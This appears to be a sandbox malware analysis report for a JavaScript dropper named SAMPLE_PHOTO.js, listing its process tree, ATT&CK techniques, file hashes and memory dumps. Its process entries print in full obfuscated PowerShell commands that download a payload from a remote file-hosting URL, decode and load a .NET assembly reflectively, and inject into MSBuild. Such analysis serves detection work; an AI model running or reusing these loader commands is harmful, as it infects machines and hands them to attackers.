2tMdesativado2tM,2tMdesativad'+'o2tM,2tMdesativado2tM,2tMdesativado2tM'+',2tMdesativado2tM,2tMdesativado2tM,2tM12tM,2tMdesativado2tM));')-RePlaCE '2tM',[ChAr]39 -RePlaCE ([ChAr]67+[ChAr]106+[ChAr]77),[ChAr]124 -RePlaCE([ChAr]89+[ChAr]101+[ChAr]78),[ChAr]36)|& ( $SheLliD[1]+$SHelLiD[13]+'X')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2452
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1260

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\SAMPLE_PHOTO.js"
1⤵
- Checks computer location settings
PID:1292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAWQBlAE4AaQBtACcAKwAnAGEAZwBlAFUAcgBsACAAPQAgADIAdAAnACsAJwBNAGgAdAB0AHAAcwA6AC8ALwAxADAAMQA3AC4AZgBpAGwAZQBtAGEAaQBsAC4AYwBvAG0ALwBhAHAAaQAvAGYAaQBsAGUALwBnAGUAdAA/AGYAaQBsAGUAawBlAHkAPQAyAEEAYQBfAGIAVwBvACcAKwAnADkAUgBlAHUANAA1AHQANwBCAFUAMQBrAFYAZwBzAGQAOQBwAFQAOQBwAGcAUwBTAGwAdgBTAHQAJwArACcARwByAG4AVABJAEMAZgBGAGgAbQBUAEsAagAzAEwAQwA2AFMAUQB0AEkAYwBPAGMAXwBUADMANQB3ACYAcABrAF8AdgBpAGQAPQBmAGQANABmADYAMQA0AGIAYgAyADAAOQBjADYAMgBjADEANwAzADAAOQA0ACcAKwAnADUAMQA3ADYAYQAwADkAMAA0AGYAIAAyAHQATQA7AFkAZQBOAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwAnACsAJwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBZAGUATgBpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAFkAZQBOAHcAJwArACcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkACcAKwAnAEQAYQB0AGEAJwArACcAKABZAGUAJwArACcATgBpAG0AYQBnAGUAVQByAGwAKQA7AFkAZQBOAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdAAnACsAJwBTAHQAcgBpAG4AZwAoAFkAZQBOAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AFkAZQBOAHMAdABhACcAKwAnAHIAdABGAGwAYQBnACAAPQAgADIAdABNADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AMgB0AE0AJwArACcAOwBZAGUATgBlAG4AZABGAGwAYQBnACAAPQAgACcAKwAnADIAdABNADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAyAHQATQA7AFkAZQBOAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAWQBlAE4AJwArACcAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AJwArACcAZABlAHgATwBmACgAWQBlAE4AcwB0AGEAcgB0AEYAbABhAGcAKQA7AFkAZQBOAGUAbgBkAEkAbgBkAGUAeAAgAD0AIABZAGUATgBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABZAGUATgBlAG4AZAAnACsAJwBGAGwAYQBnACkAOwBZAGUATgBzAHQAYQByAHQASQBuAGQAZQB4ACcAKwAnACAALQAnACsAJwBnAGUAIAAwACAALQBhAG4AZAAgAFkAZQBOAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwAnACsAJwB0ACAAWQBlAE4AcwB0AGEAcgB0AEkAbgBkAGUAeAA7AFkAZQBOAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIABZAGUATgBzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAWQBlAE4AYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAWQBlAE4AZQBuAGQASQBuAGQAZQB4ACAALQAgAFkAZQBOAHMAdABhAHIAdABJAG4AZABlACcAKwAnAHgAOwBZAGUATgBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAFkAZQBOAGkAbQBhAGcAZQBUAGUAeAB0ACcAKwAnAC4AUwB1AGIAcwB0AHIAaQBuAGcAKABZAGUATgBzAHQAYQByAHQASQBuAGQAZQB4ACwAIABZAGUATgBiAGEAcwBlADYAJwArACcANABMAGUAJwArACcAbgBnAHQAaAApADsAWQBlAE4AYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWQBlAE4AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIABDAGoATQAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABZAGUATgBfACAAfQApAFsALQAnACsAJwAxAC4ALgAtACgAWQBlAE4AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AFkAZQBOACcAKwAnAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwAnACsAJwB0AHIAaQBuAGcAKABZAGUAJwArACcATgBiAGEAcwBlADYAJwArACcANABSAGUAdgBlAHIAcwBlAGQAKQA7AFkAZQBOAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQAnACsAJwBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWQBlAE4AYwBvAG0AbQBhAG4AZABCAHkAdABlACcAKwAnAHMAKQAnACsAJwA7AFkAZQBOAHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaAAnACsAJwBvAGQAKAAyACcAKwAnAHQATQBWAEEASQAyAHQATQApADsAWQBlAE4AdgBhAGkATQBlAHQAaABvAGQALgBJAG4AdgBvAGsAZQAoAFkAZQBOAG4AdQBsAGwALAAgAEAAKAAyAHQATQB0AHgAdAAuAG4AcgBlAHQAcwBlAHcALwAnACsAJwB2AGUAJwArACcAZAAuADIAcgAuADMAOQBiADMANAA1ADMAMAAyAGEAMAA3ADUAYgAxAGIAYwAwAGQANAA1AGIANgAzACcAKwAnADIAZQBiADkAZQBlADYAMgAtAGIAdQBwAC8ALwA6AHMAcAAnACsAJwB0AHQAaAAyAHQATQAsACAAMgB0AE0AZABlAHMAYQB0AGkAdgBhAGQAbwAyAHQATQAsACAAMgB0AE0AZAAnACsAJwBlAHMAYQB0AGkAdgBhAGQAbwAyAHQATQAsACAAMgB0AE0AZABlAHMAYQB0AGkAdgBhAGQAbwAyAHQATQAsACAAMgB0AE0ATQBTAEIAdQBpAGwAZAAyAHQATQAsACAAMgB0AE0AZABlAHMAYQB0AGkAdgBhAGQAbwAyAHQATQAsACAAMgB0AE0AZABlAHMAYQB0AGkAdgBhAGQAbwAyAHQATQAsADIAdABNAGQAZQBzAGEAdABpAHYAYQBkACcAKwAnAG8AMgB0AE0ALAAyAHQATQBkAGUAcwBhAHQAaQB2AGEAZABvADIAdABNACwAMgB0AE0AZABlAHMAYQB0AGkAdgBhAGQAbwAyAHQATQAnACsAJwAsADIAdABNAGQAZQBzAGEAdABpAHYAYQBkAG8AMgB0AE0ALAAyAHQATQBkAGUAcwBhAHQAaQB2AGEAZABvADIAdABNACwAMgB0AE0AMQAyAHQATQAsADIAdABNAGQAZQBzAGEAdABpAHYAYQBkAG8AMgB0AE0AKQApADsAJwApAC0AUgBlAFAAbABhAEMARQAgACAAJwAyAHQATQAnACwAWwBDAGgAQQByAF0AMwA5ACAALQBSAGUAUABsAGEAQwBFACAAKABbAEMAaABBAHIAXQA2ADcAKwBbAEMAaABBAHIAXQAxADAANgArAFsAQwBoAEEAcgBdADcANwApACwAWwBDAGgAQQByAF0AMQAyADQAIAAgAC0AUgBlAFAAbABhAEMARQAoAFsAQwBoAEEAcgBdADgAOQArAFsAQwBoAEEAcgBdADEAMAAxACsAWwBDAGgAQQByAF0ANwA4ACkALABbAEMAaABBAHIAXQAzADYAKQB8ACYAIAAoACAAJABTAGgAZQBMAGwAaQBEAFsAMQBdACsAJABTAEgAZQBsAEwAaQBEAFsAMQAzAF0AKwAnAFgAJwApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('YeNim'+'ageUrl = 2t'+'Mhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo'+'9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c173094'+'5176a0904f 2tM;YeNwebClient = New-Object Sys'+'tem.Net.WebClient;YeNimageBytes = YeNw'+'ebClient.Download'+'Data'+'(Ye'+'NimageUrl);YeNimageText = [System.Text.Encoding]::UTF8.Get'+'String(YeNimageBytes);YeNsta'+'rtFlag = 2tM<<BASE64_START>>2tM'+';YeNendFlag = '+'2tM<<BASE64_END>>2tM;YeNstartIndex = YeN'+'imageText.In'+'dexOf(YeNstartFlag);YeNendIndex = YeNimageText.IndexOf(YeNend'+'Flag);YeNstartIndex'+' -'+'ge 0 -and YeNendIndex -g'+'t YeNstartIndex;YeNstartIndex += YeNstartFlag.Length;YeNbase64Length = YeNendIndex - YeNstartInde'+'x;YeNbase64Command = YeNimageText'+'.Substring(YeNstartIndex, YeNbase6'+'4Le'+'ngth);YeNbase64Reversed = -join (YeNbase64Command.ToCharArray() CjM ForEach-Object { YeN_ })[-'+'1..-(YeNbase64Command.Length)];YeN'+'commandBytes = [System.Convert]::FromBase64S'+'tring(Ye'+'Nbase6'+'4Reversed);YeNloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(YeNcommandByte'+'s)'+';YeNvaiMethod = [dnlib.IO.Home].GetMeth'+'od(2'+'tMVAI2tM);YeNvaiMethod.Invoke(YeNnull, @(2tMtxt.nretsew/'+'ve'+'d.2r.39b345302a075b1bc0d45b63'+'2eb9ee62-bup//:sp'+'tth2tM, 2tMdesativado2tM, 2tMd'+'esativado2tM, 2tMdesativado2tM, 2tMMSBuild2tM, 2tMdesativado2tM, 2tMdesativado2tM,2tMdesativad'+'o2tM,2tMdesativado2tM,2tMdesativado2tM'+',2tMdesativado2tM,2tMdesativado2tM,2tM12tM,2tMdesativado2tM));')-RePlaCE '2tM',[ChAr]39 -RePlaCE ([ChAr]67+[ChAr]106+[ChAr]77),[ChAr]124 -RePlaCE([ChAr]89+[ChAr]101+[ChAr]78),[ChAr]36)|& ( $SheLliD[1]+$SHelLiD[13]+'X')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2928
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1532
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
483f6077b71dd590f300308f89310ada

SHA1
52de2f9b029c3d929eb41e7ae6913ce36a99be31

SHA256
0f2f64c56e823483f78ac3f76e18759571b69bd89f373f339ac84f05484ebeb7

SHA512
836ab505bee1cccc04e9fc8e7c251c27e9e30ae4fd147b1110c24f692761f999f5a0d8b4dc991323c7fc39a5faf5ef6b9639bf93ec7e06c312b34adc657f0bb9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
d597b2b26e7138a2ba5622561cffb76a

SHA1
1f35e6fc5cc7ffd0e0433cb3351c74276ca8d771

SHA256
f34abc2b6467fee04fe6ac835bbf64bb8ec2f9bd61d912423cb738654f278709

SHA512
fcc5800bc978c2cba8ebed2b346cff634ec87cde8c4d687818cbc9cb564931facc2e12325205b0f1b12fc6080d5a7055463721903fce491ad7ffcb00ee59d600

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
cfaa533427aaff4aefd7529728db8b03

SHA1
264a5d5123e9ad811ca2592332a94ad72de39c01

SHA256
41ea22e11ff16beb5a38d1a480421cb084fc7f8cad6b58f7335c17e57fbce697

SHA512
1ec2a481492a765568fe8920eb95d9701ce0a5bf3d2d34008e3b5b986de2136f0970b76719c686a4789f7e3cf884bc4fb99878d30d980a8ad090a982fc3ffba1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
c82e7fd5c619317a07c7c8e8d4040841

SHA1
3ba400a041be65934db4a01a9ce843339ffaf1e8

SHA256
c3677d1b6c3bd28a226e4f4c800a3665a10df79895b2084c07859abc839752ef

SHA512
b52863a54d794f85e8b2f851dbf0ce86c1682281c6df67f334fdc4293d019a9f3495dbef4cd08fc71ecfbc37dda03202ce89d6068b12106de0c55e6fdce1cdea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
17060c8f6809b6044fd9ebbb808a94d0

SHA1
b9988c0f854e88814e5eef8ef5d0612f50825dcd

SHA256
c658910afa9e613e34e53799af52ec7e0166e23da50b2bbe099fef9a498fc61c

SHA512
7be3dd28636792a792f8621023023c687e891a84e8a53142f917907539e065bdddf63568141d96f27123c26180bd357d9b34ec58cb2685a4e23ed7c04b481f50

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
876e19ef13a33c51a67ed826d424639b

SHA1
4b074cf9d43aa9aa8aa7a001372292b2079f10d5

SHA256
756d76ab9babaefc14cb0f5e5957741cec71e4ced6633ba50b70c83426ad0bed

SHA512
c48c03e48a62b0aad400c1f43d4f431ba9af103a9a40044623b337dbc0f9478339d06b08a6124df3469deb331a232314ba5aadbb32b42dbf75ed19d96bc5a89e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
3f5931414a53f0909bdab9fcdfb8775d

SHA1
5c2ddcdc870179c09250974fe0228e3a271e3fc5

SHA256
604cc32c6622e52df32129bb9e1abb608e5d433d86509099be56c0d6b32ef77b

SHA512
f1b76aa8776db386f0ccf1fe006011f60a2daf1c3577b7e81b1f598d2cb5367f15500fe95fdd668a2ec0d6a4e5242ce0f6a48a12e47218d5a38a19c26672ab01

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
d9f470794f38c99cf59188d8a77a1a8c

SHA1
39b7a3fb07f629edf8ec551edf29dc90615a8ff1

SHA256
ba578e4dccc15da6b14d78a013b5ce3dc6544f3e571bde42c3048aa877023cc4

SHA512
17ea7a1bce5f997a103af2832aa24eaf63f68810d8c42504ac36acd9ec39680a8483de2170116e21ba254c3b485b30bbb4641cb445f014b718eefdb5a0ae5ce4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
6e292585465bde495766d7ea4fdd3a34

SHA1
2d7e025327a63183a3f51429345bb6d91e308356

SHA256
3bff4b7661030daeefd08ae09872b0fb9e59e1a440e52f7a5a71d59ea238daf1

SHA512
3bc0f9fe4db0b41e931435901879d25747ae5a7d4abf8f96b89e5d3ea36b31dbd3481d0381d322e659e7d9f261456eea234315e79c8f291ce851de2f227b958f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
2bc295814af2f8dcd9ca703aed93f9f9

SHA1
3d9ff0efc0d9bdc3bcf88481d528d7aeca596790

SHA256
57c147898e0e07a413f393e66bac5823d2f93c0ab5412719de28eb9c5ad30eb3

SHA512
31c9c28f0adc31090ccdc34387b8ee2a30adb7df099bdb73fc6f7069f6a1fc87b48e20989193f93c2f67091e285e040e779941e8aec6f8cd3a1cca4deaa1a973

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
2daab79cb19c1b28919899fe9c99694a

SHA1
840da4ec84e09909fd7ce3157e6d108e6a1f8290

SHA256
ddd3bd0d984cf78d45694f8d3617d0ac6c6697debbbccf91e09b975133ea444d

SHA512
0684708c2341070a11594ac91348ecb94ceefb58111728e4b16cc63c8fb93580829792ad1cbc09d7181d7e3d164d5c24f0244d58e9770c4b6ab5e09c4d3f0d73

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
fb35f4caa33daf622d051d78f1e085e8

SHA1
80c7da1fe7135ff4911d5ff6faad79c7eae499c2

SHA256
9260ddbebdf792394b6e9fea2f6bb90f3b091456b2568dcfd6e69f5c132b418a

SHA512
8aa0cbd2bdc2b6f8209a403b1305c965fc88ff5bb4b983a06943740ca8280121c00ab722057608eb1026377c59993046657cc9783d8f879eb1e99165dca5b673

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
20b595c2fd0ad3bb13753063ee813d46

SHA1
512092f400ce9dbc577e5877d56180deea36df1a

SHA256
fc278c13fc7d59dd467367d25834eff9025263535909e85214bc2f2350a32db5

SHA512
22f133ae0a2d669a31d9d1eb6f09d73196d364ca5b6b1a25f3d55fc0be743d1b91146a7ab4ced00f690afcd36eb7c5533e5f73038fe58c890e39c43e4a8b696b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
8879d7b5c4b3294d57e67070abb458b2

SHA1
e75846aeb9314bac0cd495e27b98b930878546fb

SHA256
a5b0fe67ebf61ee4b869cb260bc5acf0a1ffe2f875af3472c05722ae9afb5038

SHA512
9c68eea0def7f7ee1c9ce8222423ebadd6d592baad55e2989f52f27e86099baed405076ebf111bafdb2850fc108989aca6d4911a5ade4cea41ae064970b71f09

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
257423ed18e1e78221cc52710684d0e3

SHA1
67d3a078ab7d4821ff4af11711ff31bdee5eabcc

SHA256
dc64f34c3628dbf46104fed38f32658ede27ec58560fb25e940c83458378546e

SHA512
8b425a4cb0d6a94441767b4b1dde1189fb381d6c73c8f5ad8fe58d404d37a50cea2bce6c37108d258c515db7aa8fe8aebc727405c1d29dbb44fe7b2919a286c9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
2f1779074a90910fd90f4d951076f120

SHA1
08b6ecad24c7712f8bf06e7ee093166fdd631dcc

SHA256
322314d04200f1a572393ca138673d04bd5ef9ac2fe2831d6b5ce03011bc1f2d

SHA512
07eb3fb968bf64751036344d4efd933b61afcdde28392f1c84c1abece1b88b9514dd7902121b70676d04082a971c3a889b1e73b692b3df7db34562ed96134f5e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
2d1d23c82cff4369fd122887236883e4

SHA1
7384fffe6993b874c3bc1973d38e4c26f9fc63e3

SHA256
2e481643a19a16f9fa62252fe322290d66fbe36a58ae922d8c05ddf55247ea59

SHA512
a236f3e709b358ab1a7fe9a2a453112bfe9f81723e62b579f7257be5eaf5be8b2e66b35f13d6918992749ba713131c4b44187f0872d2bc90a43c3556fb17850c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
277f8a28e52e5d152911ca396aafc201

SHA1
e1c9a16e02d7f441b7ef8b158bedb1d073b027bc

SHA256
db34d44a764abe98ab93c23cd7ef48ca8170e362b1123498d672b015946011d0

SHA512
03febe29689333eeed9af284ba785bdacaed2945ed6e47911129e555d2b3a83b087081fd1f2e30cfa9b4ca751261af3b2e3a3e3cd4c37c0a5d67e648d0f49f57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jcqimqvw.2qk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\SAMPLE_PHOTO.js

Filesize
133KB

MD5
8062b7eec27c368e99a1ca59cbb8fc93

SHA1
e9fbc634b182a69764cf6a4f4d7713180446c19f

SHA256
03b43ccab8bf0a5a36d68421fcb39c753a4883ea521e1c402ce079276b91a748

SHA512
eda89a4c260dad270b928dbb625309088045ad3ac8a20aa47dac04f0d5a34e82be13a305f82173635cdce696be3198e04363815e554334e0881485276eedf023

Download Submit
memory/216-57-0x00000238FC6A0000-0x00000238FC6C2000-memory.dmp

Filesize
136KB

Download
memory/1260-101-0x0000000005AF0000-0x0000000006094000-memory.dmp

Filesize
5.6MB

Download
memory/1260-95-0x0000000000400000-0x0000000000442000-memory.dmp

Filesize
264KB

Download
memory/1260-103-0x0000000006900000-0x0000000006950000-memory.dmp

Filesize
320KB

Download
memory/1260-102-0x00000000056A0000-0x0000000005706000-memory.dmp

Filesize
408KB

Download
memory/1260-104-0x00000000069F0000-0x0000000006A8C000-memory.dmp

Filesize
624KB

Download
memory/1260-110-0x0000000006C30000-0x0000000006CC2000-memory.dmp

Filesize
584KB

Download
memory/2432-129-0x00000000064E0000-0x00000000064EA000-memory.dmp

Filesize
40KB

Download
memory/2452-94-0x00000254FAEA0000-0x00000254FAFF8000-memory.dmp

Filesize
1.3MB

Download